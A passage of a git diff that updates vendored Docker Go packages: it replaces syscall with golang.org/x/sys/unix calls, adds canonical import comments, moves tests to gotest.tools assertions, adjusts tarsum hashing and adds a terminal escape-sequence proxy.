+	defer windows.LocalFree(windows.Handle(uintptr(unsafe.Pointer(argv))))
 
 	newArgs := make([]string, argc)
 	for i, v := range (*argv)[:argc] {
-		newArgs[i] = string(syscall.UTF16ToString((*v)[:]))
+		newArgs[i] = string(windows.UTF16ToString((*v)[:]))
 	}
 
 	return newArgs, nil
diff --git a/vendor/github.com/docker/docker/pkg/system/syscall_windows_test.go b/vendor/github.com/docker/docker/pkg/system/syscall_windows_test.go
index 4886b2b9b4..8e78ba6285 100644
--- a/vendor/github.com/docker/docker/pkg/system/syscall_windows_test.go
+++ b/vendor/github.com/docker/docker/pkg/system/syscall_windows_test.go
@@ -1,4 +1,4 @@
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
 import "testing"
 
diff --git a/vendor/github.com/docker/docker/pkg/system/umask.go b/vendor/github.com/docker/docker/pkg/system/umask.go
index 3d0146b01a..9912a2babb 100644
--- a/vendor/github.com/docker/docker/pkg/system/umask.go
+++ b/vendor/github.com/docker/docker/pkg/system/umask.go
@@ -1,13 +1,13 @@
 // +build !windows
 
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
 import (
-	"syscall"
+	"golang.org/x/sys/unix"
 )
 
 // Umask sets current process's file mode creation mask to newmask
 // and returns oldmask.
 func Umask(newmask int) (oldmask int, err error) {
-	return syscall.Umask(newmask), nil
+	return unix.Umask(newmask), nil
 }
diff --git a/vendor/github.com/docker/docker/pkg/system/umask_windows.go b/vendor/github.com/docker/docker/pkg/system/umask_windows.go
index 13f1de1769..fc62388c38 100644
--- a/vendor/github.com/docker/docker/pkg/system/umask_windows.go
+++ b/vendor/github.com/docker/docker/pkg/system/umask_windows.go
@@ -1,6 +1,4 @@
-// +build windows
-
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
 // Umask is not supported on the windows platform.
 func Umask(newmask int) (oldmask int, err error) {
diff --git a/vendor/github.com/docker/docker/pkg/system/utimes_freebsd.go b/vendor/github.com/docker/docker/pkg/system/utimes_freebsd.go
index e2eac3b553..ed1b9fad59 100644
--- a/vendor/github.com/docker/docker/pkg/system/utimes_freebsd.go
+++ b/vendor/github.com/docker/docker/pkg/system/utimes_freebsd.go
@@ -1,20 +1,22 @@
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
 import (
 	"syscall"
 	"unsafe"
+
+	"golang.org/x/sys/unix"
 )
 
 // LUtimesNano is used to change access and modification time of the specified path.
-// It's used for symbol link file because syscall.UtimesNano doesn't support a NOFOLLOW flag atm.
+// It's used for symbol link file because unix.UtimesNano doesn't support a NOFOLLOW flag atm.
 func LUtimesNano(path string, ts []syscall.Timespec) error {
 	var _path *byte
-	_path, err := syscall.BytePtrFromString(path)
+	_path, err := unix.BytePtrFromString(path)
 	if err != nil {
 		return err
 	}
 
-	if _, _, err := syscall.Syscall(syscall.SYS_LUTIMES, uintptr(unsafe.Pointer(_path)), uintptr(unsafe.Pointer(&ts[0])), 0); err != 0 && err != syscall.ENOSYS {
+	if _, _, err := unix.Syscall(unix.SYS_LUTIMES, uintptr(unsafe.Pointer(_path)), uintptr(unsafe.Pointer(&ts[0])), 0); err != 0 && err != unix.ENOSYS {
 		return err
 	}
 
diff --git a/vendor/github.com/docker/docker/pkg/system/utimes_linux.go b/vendor/github.com/docker/docker/pkg/system/utimes_linux.go
index fc8a1aba95..0afe854589 100644
--- a/vendor/github.com/docker/docker/pkg/system/utimes_linux.go
+++ b/vendor/github.com/docker/docker/pkg/system/utimes_linux.go
@@ -1,24 +1,23 @@
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
 import (
 	"syscall"
 	"unsafe"
+
+	"golang.org/x/sys/unix"
 )
 
 // LUtimesNano is used to change access and modification time of the specified path.
-// It's used for symbol link file because syscall.UtimesNano doesn't support a NOFOLLOW flag atm.
+// It's used for symbol link file because unix.UtimesNano doesn't support a NOFOLLOW flag atm.
 func LUtimesNano(path string, ts []syscall.Timespec) error {
-	// These are not currently available in syscall
-	atFdCwd := -100
-	atSymLinkNoFollow := 0x100
+	atFdCwd := unix.AT_FDCWD
 
 	var _path *byte
-	_path, err := syscall.BytePtrFromString(path)
+	_path, err := unix.BytePtrFromString(path)
 	if err != nil {
 		return err
 	}
-
-	if _, _, err := syscall.Syscall6(syscall.SYS_UTIMENSAT, uintptr(atFdCwd), uintptr(unsafe.Pointer(_path)), uintptr(unsafe.Pointer(&ts[0])), uintptr(atSymLinkNoFollow), 0, 0); err != 0 && err != syscall.ENOSYS {
+	if _, _, err := unix.Syscall6(unix.SYS_UTIMENSAT, uintptr(atFdCwd), uintptr(unsafe.Pointer(_path)), uintptr(unsafe.Pointer(&ts[0])), unix.AT_SYMLINK_NOFOLLOW, 0, 0); err != 0 && err != unix.ENOSYS {
 		return err
 	}
 
diff --git a/vendor/github.com/docker/docker/pkg/system/utimes_unix_test.go b/vendor/github.com/docker/docker/pkg/system/utimes_unix_test.go
index a73ed118c9..cc0e7cbf1f 100644
--- a/vendor/github.com/docker/docker/pkg/system/utimes_unix_test.go
+++ b/vendor/github.com/docker/docker/pkg/system/utimes_unix_test.go
@@ -1,6 +1,6 @@
 // +build linux freebsd
 
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
 import (
 	"io/ioutil"
diff --git a/vendor/github.com/docker/docker/pkg/system/utimes_unsupported.go b/vendor/github.com/docker/docker/pkg/system/utimes_unsupported.go
index 139714544d..095e072e1d 100644
--- a/vendor/github.com/docker/docker/pkg/system/utimes_unsupported.go
+++ b/vendor/github.com/docker/docker/pkg/system/utimes_unsupported.go
@@ -1,6 +1,6 @@
 // +build !linux,!freebsd
 
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
 import "syscall"
 
diff --git a/vendor/github.com/docker/docker/pkg/system/xattrs_linux.go b/vendor/github.com/docker/docker/pkg/system/xattrs_linux.go
index d2e2c05799..66d4895b27 100644
--- a/vendor/github.com/docker/docker/pkg/system/xattrs_linux.go
+++ b/vendor/github.com/docker/docker/pkg/system/xattrs_linux.go
@@ -1,63 +1,29 @@
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
-import (
-	"syscall"
-	"unsafe"
-)
+import "golang.org/x/sys/unix"
 
 // Lgetxattr retrieves the value of the extended attribute identified by attr
 // and associated with the given path in the file system.
 // It will returns a nil slice and nil error if the xattr is not set.
 func Lgetxattr(path string, attr string) ([]byte, error) {
-	pathBytes, err := syscall.BytePtrFromString(path)
-	if err != nil {
-		return nil, err
-	}
-	attrBytes, err := syscall.BytePtrFromString(attr)
-	if err != nil {
-		return nil, err
-	}
-
 	dest := make([]byte, 128)
-	destBytes := unsafe.Pointer(&dest[0])
-	sz, _, errno := syscall.Syscall6(syscall.SYS_LGETXATTR, uintptr(unsafe.Pointer(pathBytes)), uintptr(unsafe.Pointer(attrBytes)), uintptr(destBytes), uintptr(len(dest)), 0, 0)
-	if errno == syscall.ENODATA {
+	sz, errno := unix.Lgetxattr(path, attr, dest)
+	if errno == unix.ENODATA {
 		return nil, nil
 	}
-	if errno == syscall.ERANGE {
+	if errno == unix.ERANGE {
 		dest = make([]byte, sz)
-		destBytes := unsafe.Pointer(&dest[0])
-		sz, _, errno = syscall.Syscall6(syscall.SYS_LGETXATTR, uintptr(unsafe.Pointer(pathBytes)), uintptr(unsafe.Pointer(attrBytes)), uintptr(destBytes), uintptr(len(dest)), 0, 0)
+		sz, errno = unix.Lgetxattr(path, attr, dest)
 	}
-	if errno != 0 {
+	if errno != nil {
 		return nil, errno
 	}
 
 	return dest[:sz], nil
 }
 
-var _zero uintptr
-
 // Lsetxattr sets the value of the extended attribute identified by attr
 // and associated with the given path in the file system.
 func Lsetxattr(path string, attr string, data []byte, flags int) error {
-	pathBytes, err := syscall.BytePtrFromString(path)
-	if err != nil {
-		return err
-	}
-	attrBytes, err := syscall.BytePtrFromString(attr)
-	if err != nil {
-		return err
-	}
-	var dataBytes unsafe.Pointer
-	if len(data) > 0 {
-		dataBytes = unsafe.Pointer(&data[0])
-	} else {
-		dataBytes = unsafe.Pointer(&_zero)
-	}
-	_, _, errno := syscall.Syscall6(syscall.SYS_LSETXATTR, uintptr(unsafe.Pointer(pathBytes)), uintptr(unsafe.Pointer(attrBytes)), uintptr(dataBytes), uintptr(len(data)), uintptr(flags), 0)
-	if errno != 0 {
-		return errno
-	}
-	return nil
+	return unix.Lsetxattr(path, attr, data, flags)
 }
diff --git a/vendor/github.com/docker/docker/pkg/system/xattrs_unsupported.go b/vendor/github.com/docker/docker/pkg/system/xattrs_unsupported.go
index 0114f2227c..d780a90cd3 100644
--- a/vendor/github.com/docker/docker/pkg/system/xattrs_unsupported.go
+++ b/vendor/github.com/docker/docker/pkg/system/xattrs_unsupported.go
@@ -1,6 +1,6 @@
 // +build !linux
 
-package system
+package system // import "github.com/docker/docker/pkg/system"
 
 // Lgetxattr is not supported on platforms other than linux.
 func Lgetxattr(path string, attr string) ([]byte, error) {
diff --git a/vendor/github.com/docker/docker/pkg/tailfile/tailfile.go b/vendor/github.com/docker/docker/pkg/tailfile/tailfile.go
index 09eb393ab7..e835893746 100644
--- a/vendor/github.com/docker/docker/pkg/tailfile/tailfile.go
+++ b/vendor/github.com/docker/docker/pkg/tailfile/tailfile.go
@@ -1,6 +1,6 @@
 // Package tailfile provides helper functions to read the nth lines of any
 // ReadSeeker.
-package tailfile
+package tailfile // import "github.com/docker/docker/pkg/tailfile"
 
 import (
 	"bytes"
@@ -16,7 +16,7 @@ var eol = []byte("\n")
 // ErrNonPositiveLinesNumber is an error returned if the lines number was negative.
 var ErrNonPositiveLinesNumber = errors.New("The number of lines to extract from the file must be positive")
 
-//TailFile returns last n lines of reader f (could be a fil).
+//TailFile returns last n lines of reader f (could be a nil).
 func TailFile(f io.ReadSeeker, n int) ([][]byte, error) {
 	if n <= 0 {
 		return nil, ErrNonPositiveLinesNumber
diff --git a/vendor/github.com/docker/docker/pkg/tailfile/tailfile_test.go b/vendor/github.com/docker/docker/pkg/tailfile/tailfile_test.go
index 31217c036c..c74bb02e16 100644
--- a/vendor/github.com/docker/docker/pkg/tailfile/tailfile_test.go
+++ b/vendor/github.com/docker/docker/pkg/tailfile/tailfile_test.go
@@ -1,4 +1,4 @@
-package tailfile
+package tailfile // import "github.com/docker/docker/pkg/tailfile"
 
 import (
 	"io/ioutil"
diff --git a/vendor/github.com/docker/docker/pkg/tarsum/builder_context.go b/vendor/github.com/docker/docker/pkg/tarsum/builder_context.go
index b42983e984..bc7d84df4e 100644
--- a/vendor/github.com/docker/docker/pkg/tarsum/builder_context.go
+++ b/vendor/github.com/docker/docker/pkg/tarsum/builder_context.go
@@ -1,4 +1,4 @@
-package tarsum
+package tarsum // import "github.com/docker/docker/pkg/tarsum"
 
 // BuilderContext is an interface extending TarSum by adding the Remove method.
 // In general there was concern about adding this method to TarSum itself
diff --git a/vendor/github.com/docker/docker/pkg/tarsum/builder_context_test.go b/vendor/github.com/docker/docker/pkg/tarsum/builder_context_test.go
index f54bf3a1bd..86adb442d6 100644
--- a/vendor/github.com/docker/docker/pkg/tarsum/builder_context_test.go
+++ b/vendor/github.com/docker/docker/pkg/tarsum/builder_context_test.go
@@ -1,4 +1,4 @@
-package tarsum
+package tarsum // import "github.com/docker/docker/pkg/tarsum"
 
 import (
 	"io"
diff --git a/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums.go b/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums.go
index 5abf5e7ba3..01d4ed59b2 100644
--- a/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums.go
+++ b/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums.go
@@ -1,6 +1,10 @@
-package tarsum
+package tarsum // import "github.com/docker/docker/pkg/tarsum"
 
-import "sort"
+import (
+	"runtime"
+	"sort"
+	"strings"
+)
 
 // FileInfoSumInterface provides an interface for accessing file checksum
 // information within a tar file. This info is accessed through interface
@@ -35,8 +39,11 @@ type FileInfoSums []FileInfoSumInterface
 
 // GetFile returns the first FileInfoSumInterface with a matching name.
 func (fis FileInfoSums) GetFile(name string) FileInfoSumInterface {
+	// We do case insensitive matching on Windows as c:\APP and c:\app are
+	// the same. See issue #33107.
 	for i := range fis {
-		if fis[i].Name() == name {
+		if (runtime.GOOS == "windows" && strings.EqualFold(fis[i].Name(), name)) ||
+			(runtime.GOOS != "windows" && fis[i].Name() == name) {
 			return fis[i]
 		}
 	}
diff --git a/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums_test.go b/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums_test.go
index bb700d8bde..e6ebd9cc86 100644
--- a/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums_test.go
+++ b/vendor/github.com/docker/docker/pkg/tarsum/fileinfosums_test.go
@@ -1,4 +1,4 @@
-package tarsum
+package tarsum // import "github.com/docker/docker/pkg/tarsum"
 
 import "testing"
 
@@ -46,7 +46,7 @@ func TestSortFileInfoSums(t *testing.T) {
 	fis = newFileInfoSums()
 	fis.SortByPos()
 	if fis[0].Pos() != 0 {
-		t.Errorf("sorted fileInfoSums by Pos should order them by position.")
+		t.Error("sorted fileInfoSums by Pos should order them by position.")
 	}
 
 	fis = newFileInfoSums()
@@ -56,7 +56,7 @@ func TestSortFileInfoSums(t *testing.T) {
 		t.Errorf("Expected %q, got %q", expected, gotFileInfoSum)
 	}
 	if fis.GetFile("noPresent") != nil {
-		t.Errorf("Should have return nil if name not found.")
+		t.Error("Should have return nil if name not found.")
 	}
 
 }
diff --git a/vendor/github.com/docker/docker/pkg/tarsum/tarsum.go b/vendor/github.com/docker/docker/pkg/tarsum/tarsum.go
index 154788db82..5542e1b2c0 100644
--- a/vendor/github.com/docker/docker/pkg/tarsum/tarsum.go
+++ b/vendor/github.com/docker/docker/pkg/tarsum/tarsum.go
@@ -15,7 +15,7 @@
 // constraining the ordering or manipulation of the files during the creation or
 // unpacking of the archive, nor include additional metadata state about the file
 // system attributes.
-package tarsum
+package tarsum // import "github.com/docker/docker/pkg/tarsum"
 
 import (
 	"archive/tar"
@@ -160,6 +160,11 @@ func (sth simpleTHash) Hash() hash.Hash { return sth.h() }
 
 func (ts *tarSum) encodeHeader(h *tar.Header) error {
 	for _, elem := range ts.headerSelector.selectHeaders(h) {
+		// Ignore these headers to be compatible with versions
+		// before go 1.10
+		if elem[0] == "gname" || elem[0] == "uname" {
+			elem[1] = ""
+		}
 		if _, err := ts.h.Write([]byte(elem[0] + elem[1])); err != nil {
 			return err
 		}
@@ -219,6 +224,10 @@ func (ts *tarSum) Read(buf []byte) (int, error) {
 				ts.first = false
 			}
 
+			if _, err := ts.tarW.Write(buf2[:n]); err != nil {
+				return 0, err
+			}
+
 			currentHeader, err := ts.tarR.Next()
 			if err != nil {
 				if err == io.EOF {
@@ -232,21 +241,19 @@ func (ts *tarSum) Read(buf []byte) (int, error) {
 						return 0, err
 					}
 					ts.finished = true
-					return n, nil
+					return ts.bufWriter.Read(buf)
 				}
-				return n, err
+				return 0, err
 			}
-			ts.currentFile = path.Clean(currentHeader.Name)
+
+			ts.currentFile = path.Join(".", path.Join("/", currentHeader.Name))
 			if err := ts.encodeHeader(currentHeader); err != nil {
 				return 0, err
 			}
 			if err := ts.tarW.WriteHeader(currentHeader); err != nil {
 				return 0, err
 			}
-			if _, err := ts.tarW.Write(buf2[:n]); err != nil {
-				return 0, err
-			}
-			ts.tarW.Flush()
+
 			if _, err := io.Copy(ts.writer, ts.bufTar); err != nil {
 				return 0, err
 			}
@@ -254,7 +261,7 @@ func (ts *tarSum) Read(buf []byte) (int, error) {
 
 			return ts.bufWriter.Read(buf)
 		}
-		return n, err
+		return 0, err
 	}
 
 	// Filling the hash buffer
@@ -266,7 +273,6 @@ func (ts *tarSum) Read(buf []byte) (int, error) {
 	if _, err = ts.tarW.Write(buf2[:n]); err != nil {
 		return 0, err
 	}
-	ts.tarW.Flush()
 
 	// Filling the output writer
 	if _, err = io.Copy(ts.writer, ts.bufTar); err != nil {
diff --git a/vendor/github.com/docker/docker/pkg/tarsum/tarsum_test.go b/vendor/github.com/docker/docker/pkg/tarsum/tarsum_test.go
index 86df0e2b89..435b91c780 100644
--- a/vendor/github.com/docker/docker/pkg/tarsum/tarsum_test.go
+++ b/vendor/github.com/docker/docker/pkg/tarsum/tarsum_test.go
@@ -1,4 +1,4 @@
-package tarsum
+package tarsum // import "github.com/docker/docker/pkg/tarsum"
 
 import (
 	"archive/tar"
@@ -16,6 +16,9 @@ import (
 	"os"
 	"strings"
 	"testing"
+
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
 type testLayer struct {
@@ -66,19 +69,19 @@ var testLayers = []testLayer{
 	{
 		// this tar has two files with the same path
 		filename: "testdata/collision/collision-0.tar",
-		tarsum:   "tarsum+sha256:08653904a68d3ab5c59e65ef58c49c1581caa3c34744f8d354b3f575ea04424a"},
+		tarsum:   "tarsum+sha256:7cabb5e9128bb4a93ff867b9464d7c66a644ae51ea2e90e6ef313f3bef93f077"},
 	{
 		// this tar has the same two files (with the same path), but reversed order. ensuring is has different hash than above
 		filename: "testdata/collision/collision-1.tar",
-		tarsum:   "tarsum+sha256:b51c13fbefe158b5ce420d2b930eef54c5cd55c50a2ee4abdddea8fa9f081e0d"},
+		tarsum:   "tarsum+sha256:805fd393cfd58900b10c5636cf9bab48b2406d9b66523122f2352620c85dc7f9"},
 	{
 		// this tar has newer of collider-0.tar, ensuring is has different hash
 		filename: "testdata/collision/collision-2.tar",
-		tarsum:   "tarsum+sha256:381547080919bb82691e995508ae20ed33ce0f6948d41cafbeb70ce20c73ee8e"},
+		tarsum:   "tarsum+sha256:85d2b8389f077659d78aca898f9e632ed9161f553f144aef100648eac540147b"},
 	{
 		// this tar has newer of collider-1.tar, ensuring is has different hash
 		filename: "testdata/collision/collision-3.tar",
-		tarsum:   "tarsum+sha256:f886e431c08143164a676805205979cd8fa535dfcef714db5515650eea5a7c0f"},
+		tarsum:   "tarsum+sha256:cbe4dee79fe979d69c16c2bccd032e3205716a562f4a3c1ca1cbeed7b256eb19"},
 	{
 		options: &sizedOptions{1, 1024 * 1024, false, false}, // a 1mb file (in memory)
 		tarsum:  "tarsum+md5:0d7529ec7a8360155b48134b8e599f53",
@@ -222,17 +225,13 @@ func TestNewTarSumForLabel(t *testing.T) {
 func TestEmptyTar(t *testing.T) {
 	// Test without gzip.
 	ts, err := emptyTarSum(false)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	zeroBlock := make([]byte, 1024)
 	buf := new(bytes.Buffer)
 
 	n, err := io.Copy(buf, ts)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 
 	if n != int64(len(zeroBlock)) || !bytes.Equal(buf.Bytes(), zeroBlock) {
 		t.Fatalf("tarSum did not write the correct number of zeroed bytes: %d", n)
@@ -247,19 +246,16 @@ func TestEmptyTar(t *testing.T) {
 
 	// Test with gzip.
 	ts, err = emptyTarSum(true)
-	if err != nil {
-		t.Fatal(err)
-	}
+	assert.NilError(t, err)
 	buf.Reset()
 
-	n, err = io.Copy(buf, ts)
-	if err != nil {
-		t.Fatal(err)
-	}
+	_, err = io.Copy(buf, ts)
+	assert.NilError(t, err)
 
 	bufgz := new(bytes.Buffer)
 	gz := gzip.NewWriter(bufgz)
 	n, err = io.Copy(gz, bytes.NewBuffer(zeroBlock))
+	assert.NilError(t, err)
 	gz.Close()
 	gzBytes := bufgz.Bytes()
 
@@ -279,10 +275,7 @@ func TestEmptyTar(t *testing.T) {
 	}
 
 	resultSum = ts.Sum(nil)
-
-	if resultSum != expectedSum {
-		t.Fatalf("expected [%s] but got [%s]", expectedSum, resultSum)
-	}
+	assert.Check(t, is.Equal(expectedSum, resultSum))
 }
 
 var (
@@ -443,7 +436,7 @@ func TestIteration(t *testing.T) {
 			[]byte(""),
 		},
 		{
-			"tarsum.dev+sha256:b38166c059e11fb77bef30bf16fba7584446e80fcc156ff46d47e36c5305d8ef",
+			"tarsum.dev+sha256:862964db95e0fa7e42836ae4caab3576ab1df8d275720a45bdd01a5a3730cc63",
 			VersionDev,
 			&tar.Header{
 				Name:     "another.txt",
@@ -459,7 +452,7 @@ func TestIteration(t *testing.T) {
 			[]byte("test"),
 		},
 		{
-			"tarsum.dev+sha256:4cc2e71ac5d31833ab2be9b4f7842a14ce595ec96a37af4ed08f87bc374228cd",
+			"tarsum.dev+sha256:4b1ba03544b49d96a32bacc77f8113220bd2f6a77e7e6d1e7b33cd87117d88e7",
 			VersionDev,
 			&tar.Header{
 				Name:     "xattrs.txt",
@@ -477,7 +470,7 @@ func TestIteration(t *testing.T) {
 			[]byte("test"),
 		},
 		{
-			"tarsum.dev+sha256:65f4284fa32c0d4112dd93c3637697805866415b570587e4fd266af241503760",
+			"tarsum.dev+sha256:410b602c898bd4e82e800050f89848fc2cf20fd52aa59c1ce29df76b878b84a6",
 			VersionDev,
 			&tar.Header{
 				Name:     "xattrs.txt",
@@ -495,7 +488,7 @@ func TestIteration(t *testing.T) {
 			[]byte("test"),
 		},
 		{
-			"tarsum+sha256:c12bb6f1303a9ddbf4576c52da74973c00d14c109bcfa76b708d5da1154a07fa",
+			"tarsum+sha256:b1f97eab73abd7593c245e51070f9fbdb1824c6b00a0b7a3d7f0015cd05e9e86",
 			Version0,
 			&tar.Header{
 				Name:     "xattrs.txt",
diff --git a/vendor/github.com/docker/docker/pkg/tarsum/versioning.go b/vendor/github.com/docker/docker/pkg/tarsum/versioning.go
index 2882286854..aa1f171862 100644
--- a/vendor/github.com/docker/docker/pkg/tarsum/versioning.go
+++ b/vendor/github.com/docker/docker/pkg/tarsum/versioning.go
@@ -1,8 +1,9 @@
-package tarsum
+package tarsum // import "github.com/docker/docker/pkg/tarsum"
 
 import (
 	"archive/tar"
 	"errors"
+	"io"
 	"sort"
 	"strconv"
 	"strings"
@@ -21,6 +22,13 @@ const (
 	VersionDev
 )
 
+// WriteV1Header writes a tar header to a writer in V1 tarsum format.
+func WriteV1Header(h *tar.Header, w io.Writer) {
+	for _, elem := range v1TarHeaderSelect(h) {
+		w.Write([]byte(elem[0] + elem[1]))
+	}
+}
+
 // VersionLabelForChecksum returns the label for the given tarsum
 // checksum, i.e., everything before the first `+` character in
 // the string or an empty string if no label separator is found.
diff --git a/vendor/github.com/docker/docker/pkg/tarsum/versioning_test.go b/vendor/github.com/docker/docker/pkg/tarsum/versioning_test.go
index 88e0a5783c..79b9cc9107 100644
--- a/vendor/github.com/docker/docker/pkg/tarsum/versioning_test.go
+++ b/vendor/github.com/docker/docker/pkg/tarsum/versioning_test.go
@@ -1,4 +1,4 @@
-package tarsum
+package tarsum // import "github.com/docker/docker/pkg/tarsum"
 
 import (
 	"testing"
diff --git a/vendor/github.com/docker/docker/pkg/tarsum/writercloser.go b/vendor/github.com/docker/docker/pkg/tarsum/writercloser.go
index 9727ecde3e..c4c45a35e7 100644
--- a/vendor/github.com/docker/docker/pkg/tarsum/writercloser.go
+++ b/vendor/github.com/docker/docker/pkg/tarsum/writercloser.go
@@ -1,4 +1,4 @@
-package tarsum
+package tarsum // import "github.com/docker/docker/pkg/tarsum"
 
 import (
 	"io"
diff --git a/vendor/github.com/docker/docker/pkg/term/ascii.go b/vendor/github.com/docker/docker/pkg/term/ascii.go
index f5262bccf5..87bca8d4ac 100644
--- a/vendor/github.com/docker/docker/pkg/term/ascii.go
+++ b/vendor/github.com/docker/docker/pkg/term/ascii.go
@@ -1,4 +1,4 @@
-package term
+package term // import "github.com/docker/docker/pkg/term"
 
 import (
 	"fmt"
@@ -59,7 +59,7 @@ next:
 				return nil, fmt.Errorf("Unknown character: '%s'", key)
 			}
 		} else {
-			codes = append(codes, byte(key[0]))
+			codes = append(codes, key[0])
 		}
 	}
 	return codes, nil
diff --git a/vendor/github.com/docker/docker/pkg/term/ascii_test.go b/vendor/github.com/docker/docker/pkg/term/ascii_test.go
index 4a1e7f302c..665ab1552f 100644
--- a/vendor/github.com/docker/docker/pkg/term/ascii_test.go
+++ b/vendor/github.com/docker/docker/pkg/term/ascii_test.go
@@ -1,43 +1,25 @@
-package term
+package term // import "github.com/docker/docker/pkg/term"
 
-import "testing"
+import (
+	"testing"
+
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
 
 func TestToBytes(t *testing.T) {
 	codes, err := ToBytes("ctrl-a,a")
-	if err != nil {
-		t.Fatal(err)
-	}
-	if len(codes) != 2 {
-		t.Fatalf("Expected 2 codes, got %d", len(codes))
-	}
-	if codes[0] != 1 || codes[1] != 97 {
-		t.Fatalf("Expected '1' '97', got '%d' '%d'", codes[0], codes[1])
-	}
+	assert.NilError(t, err)
+	assert.Check(t, is.DeepEqual([]byte{1, 97}, codes))
 
-	codes, err = ToBytes("shift-z")
-	if err == nil {
-		t.Fatalf("Expected error, got none")
-	}
+	_, err = ToBytes("shift-z")
+	assert.Check(t, is.ErrorContains(err, ""))
 
 	codes, err = ToBytes("ctrl-@,ctrl-[,~,ctrl-o")
-	if err != nil {
-		t.Fatal(err)
-	}
-	if len(codes) != 4 {
-		t.Fatalf("Expected 4 codes, got %d", len(codes))
-	}
-	if codes[0] != 0 || codes[1] != 27 || codes[2] != 126 || codes[3] != 15 {
-		t.Fatalf("Expected '0' '27' '126', '15', got '%d' '%d' '%d' '%d'", codes[0], codes[1], codes[2], codes[3])
-	}
+	assert.NilError(t, err)
+	assert.Check(t, is.DeepEqual([]byte{0, 27, 126, 15}, codes))
 
 	codes, err = ToBytes("DEL,+")
-	if err != nil {
-		t.Fatal(err)
-	}
-	if len(codes) != 2 {
-		t.Fatalf("Expected 2 codes, got %d", len(codes))
-	}
-	if codes[0] != 127 || codes[1] != 43 {
-		t.Fatalf("Expected '127 '43'', got '%d' '%d'", codes[0], codes[1])
-	}
+	assert.NilError(t, err)
+	assert.Check(t, is.DeepEqual([]byte{127, 43}, codes))
 }
diff --git a/vendor/github.com/docker/docker/pkg/term/proxy.go b/vendor/github.com/docker/docker/pkg/term/proxy.go
new file mode 100644
index 0000000000..da733e5848
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/term/proxy.go
@@ -0,0 +1,78 @@
+package term // import "github.com/docker/docker/pkg/term"
+
+import (
+	"io"
+)
+
+// EscapeError is special error which returned by a TTY proxy reader's Read()
+// method in case its detach escape sequence is read.
+type EscapeError struct{}
+
+func (EscapeError) Error() string {
+	return "read escape sequence"
+}
+
+// escapeProxy is used only for attaches with a TTY. It is used to proxy
+// stdin keypresses from the underlying reader and look for the passed in
+// escape key sequence to signal a detach.
+type escapeProxy struct {
+	escapeKeys   []byte
+	escapeKeyPos int
+	r            io.Reader
+}
+
+// NewEscapeProxy returns a new TTY proxy reader which wraps the given reader
+// and detects when the specified escape keys are read, in which case the Read
+// method will return an error of type EscapeError.
+func NewEscapeProxy(r io.Reader, escapeKeys []byte) io.Reader {
+	return &escapeProxy{
+		escapeKeys: escapeKeys,
+		r:          r,
+	}
+}
+
+func (r *escapeProxy) Read(buf []byte) (int, error) {
+	nr, err := r.r.Read(buf)
+
+	if len(r.escapeKeys) == 0 {
+		return nr, err
+	}
+
+	preserve := func() {
+		// this preserves the original key presses in the passed in buffer
+		nr += r.escapeKeyPos
+		preserve := make([]byte, 0, r.escapeKeyPos+len(buf))
+		preserve = append(preserve, r.escapeKeys[:r.escapeKeyPos]...)
+		preserve = append(preserve, buf...)
+		r.escapeKeyPos = 0
+		copy(buf[0:nr], preserve)
+	}
+
+	if nr != 1 || err != nil {
+		if r.escapeKeyPos > 0 {
+			preserve()
+		}
+		return nr, err
+	}
+
+	if buf[0] != r.escapeKeys[r.escapeKeyPos] {
+		if r.escapeKeyPos > 0 {
+			preserve()
+		}
+		return nr, nil
+	}
+
+	if r.escapeKeyPos == len(r.escapeKeys)-1 {
+		return 0, EscapeError{}
+	}
+
+	// Looks like we've got an escape key, but we need to match again on the next
+	// read.
+	// Store the current escape key we found so we can look for the next one on
+	// the next read.
+	// Since this is an escape key, make sure we don't let the caller read it
+	// If later on we find that this is not the escape sequence, we'll add the
+	// keys back
+	r.escapeKeyPos++
+	return nr - r.escapeKeyPos, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/term/proxy_test.go b/vendor/github.com/docker/docker/pkg/term/proxy_test.go
new file mode 100644
index 0000000000..df588fe15b
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/term/proxy_test.go
@@ -0,0 +1,115 @@
+package term // import "github.com/docker/docker/pkg/term"
+
+import (
+	"bytes"
+	"fmt"
+	"testing"
+
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestEscapeProxyRead(t *testing.T) {
+	escapeKeys, _ := ToBytes("")
+	keys, _ := ToBytes("a")
+	reader := NewEscapeProxy(bytes.NewReader(keys), escapeKeys)
+	buf := make([]byte, len(keys))
+	nr, err := reader.Read(buf)
+	assert.NilError(t, err)
+	assert.Equal(t, nr, len(keys), fmt.Sprintf("nr %d should be equal to the number of %d", nr, len(keys)))
+	assert.DeepEqual(t, keys, buf)
+
+	keys, _ = ToBytes("a,b,c")
+	reader = NewEscapeProxy(bytes.NewReader(keys), escapeKeys)
+	buf = make([]byte, len(keys))
+	nr, err = reader.Read(buf)
+	assert.NilError(t, err)
+	assert.Equal(t, nr, len(keys), fmt.Sprintf("nr %d should be equal to the number of %d", nr, len(keys)))
+	assert.DeepEqual(t, keys, buf)
+
+	keys, _ = ToBytes("")
+	reader = NewEscapeProxy(bytes.NewReader(keys), escapeKeys)
+	buf = make([]byte, len(keys))
+	nr, err = reader.Read(buf)
+	assert.Assert(t, is.ErrorContains(err, ""), "Should throw error when no keys are to read")
+	assert.Equal(t, nr, 0, "nr should be zero")
+	assert.Check(t, is.Len(keys, 0))
+	assert.Check(t, is.Len(buf, 0))
+
